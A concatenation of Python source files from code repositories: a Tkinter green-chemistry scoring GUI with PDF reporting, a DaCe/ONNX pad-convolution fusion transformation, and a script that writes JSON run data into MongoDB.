"36805-97-7": 0.785921382127458,
"6006-65-1": 0.785921382127458,
"4909-78-8": 0.785921382127458,
"920-68-3": 0.785921382127458,
"653-37-2": 0.78349900067157,
"422-05-9": 0.78349900067157,
"2182-66-3": 0.766534069464941,
"354-64-3": 0.763789874990475,
"58479-61-1": 0.763598909336104,
"13154-24-0": 0.763598909336104,
"70-11-1": 0.761090045768687,
"723336-86-5": 0.761090045768687,
"850418-19-8": 0.761090045768687,
"850418-20-1": 0.761090045768687,
"1546-79-8": 0.758242430472499,
"24589-78-4": 0.758242430472499,
"53296-64-3": 0.758242430472499,
"77377-52-7": 0.758242430472499,
"82112-21-8": 0.757927402509425,
"375-22-4": 0.756114760094685,
"336-59-4": 0.756114760094685,
"356-42-3": 0.756114760094685,
"420-37-1": 0.75205982910284,
"77-76-9": 0.750711985826051,
"20082-71-7": 0.749832128609721,
"2251-50-5": 0.747481224283863,
"100-11-8": 0.745015119615777,
"18162-48-6": 0.743146183479067,
"425-75-2": 0.742441949845756,
"1765-40-8": 0.742441949845756,
"76437-40-6": 0.742441949845756,
"80522-42-5": 0.742441949845756,
"1538-75-6": 0.74152936540163,
"98-03-3": 0.739537905180287,
"87020-42-6": 0.737007165264001,
"589-15-1": 0.736264650708209,
"2857-97-8": 0.736016815715654,
"17950-40-2": 0.732111366794642,
"407-25-0": 0.731258587142799,
"115-20-8": 0.730613289210088,
"823-96-1": 0.721670319376414,
"71735-32-5": 0.7183910746808,
"333-27-7": 0.7183910746808,
"996-50-9": 0.714539433160182,
"3768-58-9": 0.714539433160182,
"685-27-8": 0.713300737795531,
"25561-30-2": 0.713300737795531,
"124-41-4": 0.70689269806413,
"15933-59-2": 0.705803556150421,
"18156-74-6": 0.705803556150421,
"123-62-6": 0.703483768736821,
"2083-91-2": 0.703043095426246,
"10416-59-8": 0.700353286433786,
"69739-34-0": 0.696757084764058,
"107-46-0": 0.696026303459663,
"541-88-8": 0.680085578563036,
"994-30-9": 0.659639561940176,
"75-26-3": 0.65077439166517,
"543-27-1": 0.643008761928377,
"6092-54-2": 0.619827404668639,
"76-02-8": 0.618803077595292,
"75-77-4": 0.606190113014358,
"7719-09-7": 0.598432942089881,
"1066-35-9": 0.590259358282054,
"4637-24-5": 0.587695662266982,
"920-66-1": 0.5835440122017,
"8077-35-8": 0.580905093441462,
"108-24-7": 0.56539851162607,
"10294-34-5": 0.546920496297807,
"999-97-3": 0.539120875551113,
"7637-07-2": 0.536295783559384,
"75-89-8": 0.517064147633066,
"1899-02-1": 0.453968334570473,
"17287-03-5": 0.450591161239778,
"7664-93-9": 0.430740368201206,
"132228-87-6": 0.389860157052623,
"75-59-2": 0.35207841911058,
"77-78-1": 0.185707987424391,
"19132-06-0": 1,
"1052236-86-8": 1,
"135806-59-6": 1,
"139658-04-1": 1,
"108031-79-4": 1,
"124529-02-8": 0.789788397239459,
"124529-07-3": 0.789788397239459,
"24277-43-8": 0.789788397239459,
"958300-06-6": 0.789788397239459,
"5978-70-1": 0.661143997568766,
"3886-70-2": 0.62276366189702,
"20445-31-2": 0.616318224518582,
"17257-71-5": 0.616318224518582,
"81655-41-6": 0.616318224518582,
"21451-74-1": 0.616318224518582,
"14645-24-0": 0.616318224518582,
"147948-52-5": 0.581990910059596,
"104371-20-2": 0.581990910059596,
"132679-61-9": 0.56145194750795,
"210529-62-7": 0.56145194750795,
"3347-90-8": 0.550846501071722,
"104530-16-7": 0.547959104197752,
"39637-74-6": 0.547959104197752,
"39262-22-1": 0.52022184149657,
"1517-69-7": 0.474716248097616,
"1445-91-6": 0.474716248097616,
"107474-79-3": 0.437963083473382,
"14602-86-9": 0.412055011328408,
"3886-69-9": 0.358144912356212,
"2627-86-3": 0.326740839342668,
"24277-44-9": 0.288185973785988,
"62414-75-9": 0.288185973785988,
"14152-97-7": 0.288185973785988,
"42340-98-7": 0.176714727821325,
"14649-03-7": 0.132441393121765,
"33375-06-3": 0.116078677380125,
}
v = StringVar()
chckbxVar_tab6 = StringVar()
chckbxVar_tab6.set('disabled')
# set initial blank value of the StringVar
v.set('')
search_var = StringVar()
search_var.trace("w", update_list)
entry = ttk.Entry(tab6, textvariable=search_var, width=13)
# disable the lookup box initially:
# entry.config(state=DISABLED)
scrollbar = ttk.Scrollbar(tab6, orient='vertical')
scrollbar.grid(row=3, column=0, sticky='w', ipady=30, padx=(220, 0))
lbox = Listbox(tab6, width=34, height=6, yscrollcommand=scrollbar.set) # selectmode=MULTIPLE
# disable the lbox initially:
# lbox.config(state=DISABLED)
# def lboxActivator():
#
# # chckbxVar_tab6.set('disabled')
# if chckbxVar_tab6.get() == 'enabled':
# entry.config(state=ACTIVE)
# lbox.config(state=NORMAL)
# elif chckbxVar_tab6.get() == 'disabled':
# entry.config(state=DISABLED)
# lbox.config(state=DISABLED)
#
# ttk.Checkbutton(tab6, text='Derivatisation agent is used', command=lboxActivator, variable=chckbxVar_tab6, onvalue='enabled', offvalue='disabled').grid(row=30, column=0)
# lboxActivator()
Label(tab6, text='CAS lookup: ').grid(row=2, column=0, padx=8, pady=3, sticky='w')
entry.grid(row=2, column=0, padx=(100, 0), pady=3, sticky='w')
lbox.grid(row=3, column=0, padx=8, pady=3, sticky='w')
# link the scrollbar to the list box
scrollbar.config(command=lbox.yview)
ttk.Button(tab6, text="Select", command=Select, width=8).grid(column=1, row=3, padx=4)
# clear the selection and the caption
ttk.Button(tab6, text='Clear', command=lambda:[clear_list(), update_list()], width=8).grid(column=1, row=4, padx=4)
Label(tab6, text='Selected CAS: ').grid(column=0, row=4, sticky='w', padx=8, pady=0)
ttk.Label(tab6, textvariable=v, wraplength=180, width=34, relief='groove').grid(column=0, row=5, sticky='w', padx=8, pady=4)
# call the function to populate the list at the beginning
update_list()
W_6 = weightChoice(10, 0, tab6, weight_6)
# *****************************************************************************************************************
# TAB 7
# *****************************************************************************************************************
content_7 = tab(tab7, text1='Generation of a large volume of analytical waste should be avoided, and proper management'
'of analytical waste should be provided.', text2='Enter the amount of waste in g or mL:')
amount_var7 = StringVar()
amount_var7.set('input')
# the event=None is passed so that the entry.bind does not return a positional argument
def change_entry_7(event=None):
global var_7
var_7 = None
try:
if float(amount_var7.get()) > 150:
var_7 = 0
elif float(amount_var7.get()) < 0.1:
var_7 = 1.0
else:
var_7 = abs(-0.134 * log(float(amount_var7.get())) + 0.6946) # absolute value to avoid negative values
print('var_7:' + str(var_7))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
chartPlotter()
sample_amount_entry7 = ttk.Entry(tab7, textvariable=amount_var7, width=15)
sample_amount_entry7.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# bind the <Return> key to the entry window, so that the function gets called as an alternative to the 'set' button:
sample_amount_entry7.bind('<Return>', change_entry_7)
# insert a button that does the same:
ttk.Button(tab7, text='Set', command=change_entry_7).grid(row=2, column=0, padx=8, pady=8)
W_7 = weightChoice(10, 0, tab7, weight_7)
# *****************************************************************************************************************
# TAB 8
# *****************************************************************************************************************
content_8 = tab(tab8, text1='Multi-analyte or multi-parameter methods are preferred '
'versus methods using one analyte at a time.',
text2='Number of analytes determined in a single run:')
amount_var8a = StringVar()
amount_var8a.set('input')
sample_amount_entry8a = ttk.Entry(tab8, textvariable=amount_var8a, width=15)
sample_amount_entry8a.grid(sticky='w', row=2, column=0, padx=8, pady=8)
Label(tab8, text='Sample throughput (samples analysed per hour):', wraplength=300, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
amount_var8b = StringVar()
amount_var8b.set('input')
sample_amount_entry8b = ttk.Entry(tab8, textvariable=amount_var8b, width=15)
sample_amount_entry8b.grid(sticky='w', row=4, column=0, padx=8, pady=8)
def change_entry_8(event=None):
global var_8
var_8 = None
try:
if (float(amount_var8a.get()) * float(amount_var8b.get())) < 1.0:
var_8 = 0.0
elif (float(amount_var8a.get()) * float(amount_var8b.get())) > 70.0:
var_8 = 1.0
else:
var_8 = abs(0.2429 * log(float(amount_var8a.get()) * float(amount_var8b.get())) - 0.0517) # absolute value to avoid negative values
print('var_8:' + str(var_8))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
# refresh the plot:
chartPlotter()
sample_amount_entry8b.bind('<Return>', change_entry_8)
ttk.Button(tab8, text='Set', command=change_entry_8).grid(row=5, column=0, padx=8, pady=8)
W_8 = weightChoice(10, 0, tab8, weight_8)
# *****************************************************************************************************************
# TAB 9
# *****************************************************************************************************************
content_9 = tab(tab9, text1='The use of energy should be minimized.',
text2='Select the most energy-intensive technique used in the method:')
var_9_text = StringVar(tab9)
amount_var9 = StringVar(tab9)
amount_var9.set('input')
# Dictionary with options
var_9_text_choices = { 'None': 1.0,
'FTIR': 1.0, # what about vortexing, incubation, etc.? Mineralization?
'Immunoassay': 1.0,
'Spectrofluorometry': 1.0,
'Titration': 1.0,
'UPLC': 1.0,
'UV-Vis Spectrometry': 1.0,
'AAS': 0.5,
'GC': 0.5,
'ICP-MS': 0.5,
'LC': 0.5,
'NMR': 0.0,
'GC-MS': 0.0,
'LC-MS': 0.0,
'X-ray diffractometry': 0.0}
var_9_text.set('select')
dropDown_9 = OptionMenu(tab9, var_9_text, *var_9_text_choices.keys())
dropDown_9.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_9.grid(sticky='w', row=2, column=0, padx=8, pady=8)
def change_dropdown_9(*args):
global var_9
var_9 = 1.0
var_9 = var_9_text_choices[var_9_text.get()]
print('var_9:' + str(var_9))
chartPlotter()
var_9_text.trace('w', change_dropdown_9)
ttk.Label(tab9, text='Alternatively, estimate the total power consumption of a single analysis in kWh:', wraplength=250, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
sample_amount_entry9 = ttk.Entry(tab9, textvariable=amount_var9, width=15)
sample_amount_entry9.grid(sticky='w', row=4, column=0, padx=8, pady=8)
def change_entry_9(event=None):
global var_9
var_9 = 1.0
try:
if float(amount_var9.get()) > 1.5:
var_9 = 0.0
elif float(amount_var9.get()) < 0.1:
var_9 = 1.0
else:
var_9 = abs(-0.7143 * (float(amount_var9.get())) + 1.0714) # absolute value to avoid negative values
print('var_9:' + str(var_9))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
chartPlotter()
sample_amount_entry9.bind('<Return>', change_entry_9)
ttk.Button(tab9, text='Set', command=change_entry_9).grid(row=4, column=0, padx=8, pady=8)
W_9 = weightChoice(10, 0, tab9, weight_9)
# *****************************************************************************************************************
# TAB 10
# *****************************************************************************************************************
content_10 = tab(tab10, text1='Reagents obtained from renewable sources should be preferred.',
text2='Select the type of reagents:')
var_10_text = StringVar(tab10)
# Dictionary with options
var_10_text_choices = {'No reagents': 1.0,
'All reagents are bio-based': 1.0,
'Some reagents are bio-based': 0.5,
'None of the reagents are from bio-based sources': 0.0
}
var_10_text.set('select')
dropDown_10 = OptionMenu(tab10, var_10_text, *var_10_text_choices.keys())
dropDown_10.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_10.grid(sticky='w', row=2, column=0, padx=8, pady=8)
def change_dropdown_10(*args):
global var_10
var_10 = None
var_10 = var_10_text_choices[var_10_text.get()]
print('var_10:' + str(var_10))
chartPlotter()
var_10_text.trace('w', change_dropdown_10)
W_10 = weightChoice(10, 0, tab10, weight_10)
# *****************************************************************************************************************
# TAB 11
# *****************************************************************************************************************
content_11 = tab(tab11, text1='Toxic reagents should be eliminated or replaced.',
text2='Does the method involve the use of toxic reagents?')
var_11a_text = StringVar(tab11)
# Dictionary with options
var_11a_text_choices = {'No': 1.0,
'Yes': 0.0}
var_11a_text.set('Select')
dropDown_11a = OptionMenu(tab11, var_11a_text, *var_11a_text_choices.keys())
dropDown_11a.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_11a.grid(sticky='w', row=2, column=0, padx=8, pady=8)
def enabler_11b():
if float(var_11a_text_choices[var_11a_text.get()]) == 0.0:
return 'enabled'
else:
return 'disabled'
amount_var11b = StringVar(tab11)
amount_var11b.set(0.0)
def change_dropdown_11a(*args):
global var_11
var_11 = 1.0
var_11 = var_11a_text_choices[var_11a_text.get()]
Label(tab11, text='Amount of toxic reagents in g or mL:', wraplength=300, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
reagent_entry_11 = ttk.Entry(tab11, textvariable=amount_var11b, width=15, state=enabler_11b())
reagent_entry_11.grid(sticky='w', row=4, column=0, padx=8, pady=8)
reagent_entry_11.bind('<Return>', change_dropdown_11a)
ttk.Button(tab11, text='Set', command=change_dropdown_11a).grid(row=5, column=0, padx=8, pady=8)
if float(var_11a_text_choices[var_11a_text.get()]) != 1.0:
try:
if float(amount_var11b.get()) < 0.1:
var_11 = 0.8
elif float(amount_var11b.get()) > 50.0:
var_11 = 0.0
else:
var_11 = abs(-0.129 * log(float(amount_var11b.get())) + 0.5012) # absolute value to avoid negative
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
else:
pass
chartPlotter()
print(var_11)
var_11a_text.trace('w', change_dropdown_11a)
W_11 = weightChoice(10, 0, tab11, weight_11)
# *****************************************************************************************************************
# TAB 12
# *****************************************************************************************************************
content_12 = tab(tab12, text1='Operator\'s safety should be increased.',
text2='Select the threats which are not avoided:')
varA = IntVar()
varB = IntVar()
varC = IntVar()
varD = IntVar()
varE = IntVar()
varF = IntVar()
varG = IntVar()
ttk.Checkbutton(tab12, text='toxic to aquatic life', variable=varA).grid(row=2, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='bioacumulative', variable=varB).grid(row=3, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='persistent', variable=varC).grid(row=4, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='highly flammable', variable=varD).grid(row=5, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='highly oxidizable', variable=varE).grid(row=6, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='exposive', variable=varF).grid(row=7, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='corrosive', variable=varG).grid(row=8, sticky='w', padx=8)
def testPrint():
# print(varA.get(), varB.get(), varC.get(), varD.get(), varE.get(), varF.get(), varG.get())
global var_12a
var_12a = (varA.get() + varB.get() + varC.get() + varD.get() + varE.get() + varF.get() + varG.get())
# print(var_12a)
global var_12
if var_12a == 0:
var_12 = 1.0
elif var_12a == 1:
var_12 = 0.8
elif var_12a == 2:
var_12 = 0.6
elif var_12a == 3:
var_12 = 0.4
elif var_12a == 4:
var_12 = 0.2
else:
var_12 = 0.0
print ('var_12: %f' % var_12)
chartPlotter()
ttk.Button(tab12, text='Set', command=testPrint).grid(row=9, column=0, padx=8, pady=8)
W_12 = weightChoice(10, 0, tab12, weight_12)
##################################################################################################
# pack the tab parent and its tabs:
tab_parent.pack(expand=1, fill='both')
# ttk.Button(leftFrame, text='Print score', command=printScore).pack(side=BOTTOM)
# generate the default chart at the beginning:
chartPlotter()
############################################################################################################
# generate the report in .pdf:
def generateReport():
# connect a float in range 0.0 : 1.0 to a colour in a spectrum from red to yellow to green (256 discrete colour values):
def colorMapper(value):
cmap = LinearSegmentedColormap.from_list('rg', ["red", "yellow", "green"], N=256)
mapped_color = int(value * 255)
color = cmap(mapped_color)
color_255 = []
for band in color:
color_255.append(int(band * 255))
return tuple(color_255)
pdf = FPDF('P', 'mm', 'A4')
pdf.set_font('Arial', '', 10)
pdf.add_page()
pdf.set_margins(left=30, top=30)
# save a temp image to the program's location:
plt.savefig('temp_figure.png', bbox_inches='tight')
# insert image (image, x, y, width):
pdf.image('temp_figure.png', 107, 10, 80)
# delete the temp file from drive:
os.remove('temp_figure.png')
# insert title (Arial, 'B'old, 14 pt):
pdf.set_font('Arial', 'B', 14.0)
pdf.ln(10)
pdf.cell(100, 12, 'Green index report sheet')
pdf.set_font('Arial', '', 12)
pdf.ln(15)
now = datetime.now()
pdf.cell(100, 12, now.strftime("%d/%m/%Y %H:%M:%S"))
# Text height is the same as current font size
th = pdf.font_size + 2
# a function to change the colour of a field based on the value:
def fieldColor(score):
x = colorMapper(score)[0]
y = colorMapper(score)[1]
z = colorMapper(score)[2]
pdf.set_fill_color(x, y, z)
pdf.ln(70)
# populate the table
# Table head:
pdf.set_font('Arial', 'B', 10)
pdf.cell(120, th, 'Criteria', border=0)
pdf.cell(15, th, 'Score', border=0)
pdf.cell(15, th, 'Weight', border=0)
pdf.set_font('Arial', '', 10)
pdf.ln(th)
pdf.set_fill_color(240, 240, 240)
# Rule 1
# Save top coordinate
top = pdf.y
# Calculate x position of next cell
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '1. Direct analytical techniques should be applied to avoid sample treatment.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_1)
pdf.cell(15, th * 1.6, str(round(var_1, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_1.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 2
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '2. Minimal sample size and minimal number of samples are goals.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_2)
pdf.cell(15, th * 1.6, str(round(var_2, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_2.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 3
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '3. If possible, measurements should be performed in situ.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_3)
pdf.cell(15, th * 1.6, str(round(var_3, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_3.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 4
top = pdf.y
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '4. Integration of analytical processes and operations saves energy and reduces the use of reagents.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_4)
pdf.cell(15, th * 1.6, str(round(var_4, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_4.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 5
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '5. Automated and miniaturized methods should be selected.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_5)
pdf.cell(15, th * 1.6, str(round(var_5, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_5.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 6
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '6. Derivatization should be avoided.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_6)
pdf.cell(15, th * 1.6, str(round(var_6, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_6.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 7
top = pdf.y
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '7. Generation of a large volume of analytical waste should be avoided, and proper management of analytical waste should be provided.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_7)
pdf.cell(15, th * 1.6, str(round(var_7, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_7.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 8
top = pdf.y
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '8. Multi-analyte or multi-parameter methods are preferred versus methods using one analyte at a time.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_8)
pdf.cell(15, th * 1.6, str(round(var_8, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_8.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 9
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '9. The use of energy should be minimized.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_9)
pdf.cell(15, th * 1.6, str(round(var_9, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_9.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 10
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '10. Reagents obtained from renewable sources should be preferred.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_10)
pdf.cell(15, th * 1.6, str(round(var_10, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_10.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 11
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th *1.6, '11. Toxic reagents should be eliminated or replaced.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_11)
pdf.cell(15, th * 1.6, str(round(var_11, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_11.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 12
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '12. Operator\'s safety should be increased.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_12)
pdf.cell(15, th * 1.6, str(round(var_12, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_12.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# output the pdf:
def savePDF():
ftypes = [('PDF file', '.pdf'), ('All files', '*')]
filename = filedialog.asksaveasfilename(filetypes=ftypes, defaultextension='.pdf')
# save the pdf
pdf.output(filename, 'F')
savePDF()
# add the report functionality to the file menu:
FileMenu.add_command(label='Generate report', command=generateReport)
FileMenu.add_separator()
# add a button to refresh the chart:
refreshButton = ttk.Button(leftFrame, text='RE-GENERATE PLOT', width=20,
command=lambda: [printScore(),
clearFrame(rightFrame),
pieChart(),
print_variables()
])
refreshButton.pack(side=BOTTOM, anchor=SE)
##########################################################################################################
##################################################################################################
root.mainloop() # to keep the window continuously on, otherwise it shall disappear
| Casivelaunus/Green_index | Main_window.py | Main_window.py | py | 62,363 | python | en | code | 0 | github-code | 36 |
6674627865 | import torch
from dace.transformation import transformation
from dace.properties import make_properties
from dace.sdfg.utils import node_path_graph
from dace import nodes, SDFG, SDFGState, registry, Memlet
from typing import Dict, Union
from daceml import onnx as donnx
from daceml.transformation.constant_folding import remove_node_and_computation
from daceml.util import utils
@make_properties
class PadConvFusion(transformation.SingleStateTransformation):
""" Fuse a constant pad into a convolution.
"""
pad = transformation.PatternNode(donnx.ONNXPad)
data = transformation.PatternNode(nodes.AccessNode)
conv = transformation.PatternNode(donnx.ONNXConv)
@classmethod
def expressions(cls):
return [node_path_graph(cls.pad, cls.data, cls.conv)]
def can_be_applied(self,
graph: SDFGState,
expr_index: int,
sdfg: SDFG,
permissive: bool = False) -> bool:
pad: donnx.ONNXPad = self.pad
data_node: nodes.AccessNode = self.data
conv: donnx.ONNXConv = self.conv
if pad.mode != 'constant':
return False
# Check if data in access node is used anywhere else
other_nodes = [
node for state in sdfg.nodes() for node in state.nodes() if
isinstance(node, nodes.AccessNode) and node.data == data_node.data
]
if len(other_nodes) != 1:
return False
# conservative: padded value should be 4 dimensional
if len(data_node.desc(sdfg).shape) != 4:
return False
# no other out edges
if graph.in_degree(data_node) != 1 or graph.out_degree(data_node) != 1:
return False
# check that the two pad inputs can be folded
constant_value = list(
graph.in_edges_by_connector(pad, "constant_value"))[0].data.data
pads = list(graph.in_edges_by_connector(pad, "pads"))[0].data.data
if constant_value not in sdfg._parent_onnx_model.clean_weights:
return False
if pads not in sdfg._parent_onnx_model.clean_weights:
return False
pads_value: torch.Tensor = sdfg._parent_onnx_model.clean_weights[pads]
constant_value_value: torch.Tensor = sdfg._parent_onnx_model.clean_weights[
constant_value]
if constant_value_value != 0:
return False
if len(pads_value.shape) != 1 or pads_value.shape[0] != 8:
return False
# can only eliminate the pad if it is along the spatial axes
# pads_value[i::4] gets the padding at the start and end of the i-th axis
if (not utils.iterables_equal(pads_value[0::4], [0, 0])
and utils.iterables_equal(pads_value[1::4], [0, 0])):
return False
return True
def apply(self, state: SDFGState, sdfg: SDFG):
pad: donnx.ONNXPad = self.pad
data_node: nodes.AccessNode = self.data
conv: donnx.ONNXConv = self.conv
pads = list(state.in_edges_by_connector(pad, "pads"))[0].data.data
pads_value: torch.Tensor = sdfg._parent_onnx_model.clean_weights[pads]
conv.pads[0] += int(pads_value[2::4][0])
conv.pads[2] += int(pads_value[2::4][1])
conv.pads[1] += int(pads_value[3::4][0])
conv.pads[3] += int(pads_value[3::4][1])
in_edge = next(state.in_edges_by_connector(pad, "data"))
state.add_edge(in_edge.src, in_edge.src_conn, conv, "X", in_edge.data)
state.remove_edge(in_edge)
remove_node_and_computation(sdfg, state, data_node)
| spcl/daceml | daceml/transformation/pad_conv_fusion.py | pad_conv_fusion.py | py | 3,630 | python | en | code | 69 | github-code | 36 |
26648319096 | import os
import sys
from glob import glob
from json2mongo import WriteToDataBase
import argparse
import configparser
filename = "last_run_context_numbers.txt"
# argument to be provided to the process manager
parser = argparse.ArgumentParser( description="process manager" )
# need this to read the ini file
config = configparser.ConfigParser()
def read_run_context():
"""
read the file last_run_context_numbers.txt and give back the the run & context numbers
"""
global filename
# read the last_run.txt file and get the last run and the context_version
file_infos = open(filename, "r")
last_run = int(file_infos.readline().strip())
last_context_version = file_infos.readline().strip()
return last_run, last_context_version
def loop_over_main_dir(main_dir=None, database=None):
"""
Loop over the directory $HOME/data/xom and get the main directories
The idea is to compare the context versions then the run numbers
"""
last_run, last_context = read_run_context()
list_contexts = []
for name in os.listdir( main_dir ):
if os.path.isdir( main_dir + name ) and not name.startswith("_"):
list_contexts.append( name )
print('number of contexts we have: ', list_contexts)
if len(list_contexts) > 1:
for newcontext in list_contexts:
# we are going to loop over the 'new context' and write what is inside it to the DB
# this comparison ensures that the old context was already written in DB
if newcontext > last_context :
# we go to the new directory that is made from the new context
# we get the list of directories(runs) inside this new context
current_dir = main_dir + newcontext
os.chdir( current_dir )
# we get all the runs in the new context as a list from glob
list_runs = glob('[0-9]*')
print('list of runs:', list_runs)
if len(list_runs):
for runs in list_runs:
current_dir = main_dir + newcontext + "/" + runs
#lets go inside
os.chdir(current_dir)
# we need the run number inside this new context, of course there is only one
jsonfilename = glob("*.json")[0]
run_number = int(runs)
dbwriter = WriteToDataBase(datapath=current_dir, database=database,
collection=newcontext, runnumber=run_number,
jsonfile=jsonfilename)
try:
print( 'Writing the modified json file to the DB' )
# now lets write the json file inside the data base
dbwriter.write_to_db()
except Exception as err:
print("we can't write the json file to the data base")
print("the error: ", err)
elif len(list_contexts) == 1:
if list_contexts[0] == last_context:
# we are still under the same versions of the context
# we get into the directory of that context version and loop over directories
old_context_directory = main_dir + last_context
# each directory has a name which is the run number
list_run_directories = []
for name in os.listdir( old_context_directory ):
if os.path.isdir( old_context_directory + "/" + name ):
list_run_directories.append( int( name ) )
print('the list of runs: ', list_run_directories)
# now get the run_numbers and compare them to the old one
for newrun in list_run_directories:
if newrun - last_run == 0:
# there are no changes in the run numbers just quit here.
break
# compare each run_directory with the old one:
elif newrun - last_run >=1 :
current_dir = old_context_directory + "/" + str(newrun)
# lets go inside
os.chdir( current_dir )
# we need the run number inside this new context, of course there is only one
jsonfilename = glob( "*.json" )[0]
run_number = int( jsonfilename.rstrip( ".json" ) )
dbwriter = WriteToDataBase( datapath=current_dir, database=database,
collection=last_context, runnumber=run_number,
jsonfile=jsonfilename )
try:
print( 'Writing the modified json file to the DB' )
# now lets write the json file inside the data base
dbwriter.write_to_db()
except Exception as err:
print( "Can not dump the json file to DB" )
print( "the error: ", err )
else:
sys.exit( "old_context and new context are different BUT they should not be!!!" )
else:
sys.exit("something is wrong with the module:%s" %"write_json_to_db.py")
def main():
"""
here we set all the arguments and make call for the function:loop_over_main_dir
:return: nothing
"""
config.read( "pm.ini" )
parser.add_argument( '--mainDir',
default=config["LNGS"]["maindirectory"],
type=str,
help='Name of the main directory at LNGS for data' )
parser.add_argument( '--DBLngs',
default=config["LNGS"]["db_lngs"],
type=str,
help='Name of the data base at LNGS' )
# Get the object of arguments, args
args = parser.parse_args()
print("module: write_json_to_db.py")
print("given arguments to loop_over_main_dir")
print("main dir: ", args.mainDir)
print("data base name: ", args.DBLngs)
# call loop_over_main_dir with two args
loop_over_main_dir(main_dir=args.mainDir, database=args.DBLngs)
if __name__ == "__main__" :
# now copy the json file into the database
main() | ShanJ35/XOM_master | backend/write_json_to_db.py | write_json_to_db.py | py | 6,424 | python | en | code | 0 | github-code | 36 |
16126384094 | import pandas as pd
import glob
